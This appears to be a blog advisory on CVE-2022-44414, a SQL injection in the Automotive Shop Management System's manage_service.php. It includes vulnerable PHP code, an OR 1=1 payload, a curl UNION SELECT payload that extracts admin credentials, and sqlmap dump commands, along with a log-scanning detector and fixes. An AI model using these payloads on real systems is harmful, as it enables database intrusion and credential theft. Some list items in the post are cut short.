Introduction
In today’s post, we’re taking a closer look at CVE-2022-44414, which affects the Automotive Shop Management System (ASMS) v1. This vulnerability is a classic example of SQL Injection (SQLi) found in the manage_service.php file. If you use this software, you need to pay attention—an attacker could potentially read or destroy sensitive data in your database.
Let’s break down how the vulnerability works, how you can test it, and what you should do to fix it.
What is CVE-2022-44414?
CVE-2022-44414 is a SQL Injection vulnerability discovered in the Automotive Shop Management System v1. The flaw exists in the /asms/admin/services/manage_service.php file, specifically in the id parameter.
The issue occurs because the user-supplied value of id is concatenated directly into an SQL query without validation or parameterization, so an attacker controls part of the statement the database executes.
Official References
- NVD Entry
- Exploit DB Reference
The main problem sits in this line of code (simplified):

```php
// manage_service.php (bad code example: the vulnerable pattern)
$id = $_GET['id'];                                   // untrusted value straight from the query string
$query = "SELECT * FROM services WHERE id = $id";    // interpolated into the SQL text, no quoting, no validation
$result = mysqli_query($connection, $query);
```

Here the id value is taken straight from the URL and interpolated into the SQL string without any validation or escaping.
Suppose you click this link:

```
http://example.com/asms/admin/services/manage_service.php?id=2
```

The application processes id=2 and shows service number 2. But what if we tweak the URL?

```
http://example.com/asms/admin/services/manage_service.php?id=2%20OR%201=1
```

The query becomes:

```sql
SELECT * FROM services WHERE id = 2 OR 1=1
```
Now, the condition 1=1 is always true, so the query fetches all records, potentially exposing data.
To show the impact, here is a simple example using curl:

```bash
curl "http://example.com/asms/admin/services/manage_service.php?id=1%20UNION%20SELECT%201,username,password,4%20FROM%20admin_users"
```

- Replace example.com with your target and adjust column numbers/types as needed.
- UNION SELECT lets you fetch data from another table.
- Here, for example, we’re trying to display admin usernames and passwords if the table is called admin_users.
*Note: This is for educational purposes only. Do not exploit systems you do not own or have explicit permission to test.*
Manual Testing
```
http://example.com/asms/admin/services/manage_service.php?id=1'
```

Automatic Testing (using sqlmap)
```bash
sqlmap -u "http://example.com/asms/admin/services/manage_service.php?id=1" --batch --dump
```

sqlmap will try to detect injectable parameters and may even dump table contents (if vulnerable).
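On the defensive side, the attempts above leave a clear trace in the web server log: every legitimate request to manage_service.php carries a plain integer id, so anything else is worth an alert. The following script is an added example, not part of the original post; it assumes Apache combined log format and uses constructed sample lines that mirror the URLs shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2022:19:20:01 +0000] "GET /asms/admin/services/manage_service.php?id=2 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Nov/2022:19:20:07 +0000] "GET /asms/admin/services/manage_service.php?id=2%20OR%201=1 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Nov/2022:19:20:09 +0000] "GET /asms/admin/services/manage_service.php?id=1' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Nov/2022:19:20:15 +0000] "GET /asms/admin/services/manage_service.php?id=1%20UNION%20SELECT%201,username,password,4%20FROM%20admin_users HTTP/1.1" 200 2210 "-" "sqlmap/1.6"
10.0.0.7 - - [18/Nov/2022:19:21:00 +0000] "GET /asms/admin/services/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
NUMERIC_ID = re.compile(r'^\d+$')   # the only shape a legitimate id ever has


def analyze_line(line):
    """Return a finding dict for a suspicious manage_service.php request, or None if benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/manage_service.php"):
        return None
    # parse_qs percent-decodes values, so "%20OR%201=1" is inspected as "2 OR 1=1"
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = ["non-numeric id: %r" % raw for raw in params.get("id", []) if not NUMERIC_ID.match(raw)]
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.append("sqlmap user agent")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "status": m.group("status"), "reasons": reasons}


def scan_log(text):
    """Run analyze_line over every line of a log and return the list of findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 500 response paired with a non-numeric id (the `id=1'` probe) is the strongest single signal, since it means the injected quote reached the database and broke the statement.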
1. Use Prepared Statements
Don’t insert user input directly into queries. Instead, use parameterized queries:

```php
$id = $_GET['id'];
$stmt = $connection->prepare("SELECT * FROM services WHERE id = ?");
$stmt->bind_param("i", $id);   // "i" binds the value as an integer, never as SQL text
$stmt->execute();
```

2. Validate Input
Allow only numbers if an id must be numeric:

```php
$id = intval($_GET['id']);
```
3. Least Privilege
Don’t let your database user have more permissions than necessary. This limits the damage an attacker can do.
4. Update and Patch
Check with the project maintainers for an updated, patched version. If it’s abandoned, consider migrating to a better-maintained system.
Why This Matters
SQL Injection is one of the most dangerous web vulnerabilities. A successful attack could let hackers:
- Destroy or corrupt your database.
If you’re building or running anything with PHP and MySQL, never trust user input!
Conclusion
CVE-2022-44414 is a textbook example of what happens when you skip input validation and prepared statements in your code. Automotive Shop Management System v1. users should patch their systems as soon as possible and always follow secure coding practices.
Remember:
Further Reading
- OWASP SQL Injection
- PHP: Prepared Statements
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:57:00 UTC